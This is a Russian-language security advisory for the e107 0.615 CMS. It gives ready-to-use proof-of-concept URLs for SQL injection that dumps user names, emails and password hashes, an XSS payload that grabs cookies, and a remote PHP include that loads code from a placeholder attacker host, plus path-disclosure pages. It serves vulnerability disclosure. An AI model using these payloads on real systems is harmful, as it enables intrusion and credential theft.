Программа: e107 0.615 

Несколько уязвимостей обнаружена в e107. Удаленный пользователь может выполнить SQL команды и выполнить XSS нападение. В некоторых случаях, удаленный пользователь может выполнить произвольный PGP код на целевой системе. Также удаленный пользователь может раскрыть инсталляционный путь. 

1. SQl инъекция: 

http://localhost/e107_0615/content.php?content.99/* */UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),
user_email,CHAR(58),user_password),null,null,null,null,null,null, null,null,null/**/FROM/**/e107_user/**/
WHERE/**/user_id=1/* 

http://localhost/e107_0615/content.php?query=content_id=99
%20UNION%20select%20null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),
null,null,null,null,null, null,null,null,null,null,null%20FROM%20e107
_user%20WHERE%20user_id=1/*

http://localhost/e107_0615/news.php? list.99/**/UNION/**/SELECT/**/nul l,null,
CONCAT(user_name,CHAR(58),user_email, CHAR(58),user_password),null,null,null,null,null,
null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

2. XSS: 

http://localhost/e107_0615/e107_plugins/clock_menu/ clock _menu.php?clock_flat=1&LAN_407=foo%22);
//--%3E%3C/script%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E

http://localhost/e107_0615/usersettings.php? avmsg=[xss code here]

Поле "logged name" в "email article to a friend" и "submit news" также уязвимо к XSS. 

3. PHP include: 

http://localhost/e107_0615/e107_handlers/secure_img_render.php? p=http://[attacker]/evil.php

4. Раскрытие пути: 

http://localhost/e107_0615/e107_plugins/ alt_news/alt_news.php
http://localhost/e107_0615/e107_plugin s/ backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/ clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/ counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins /login_menu/login_menu.php

Оставить мнение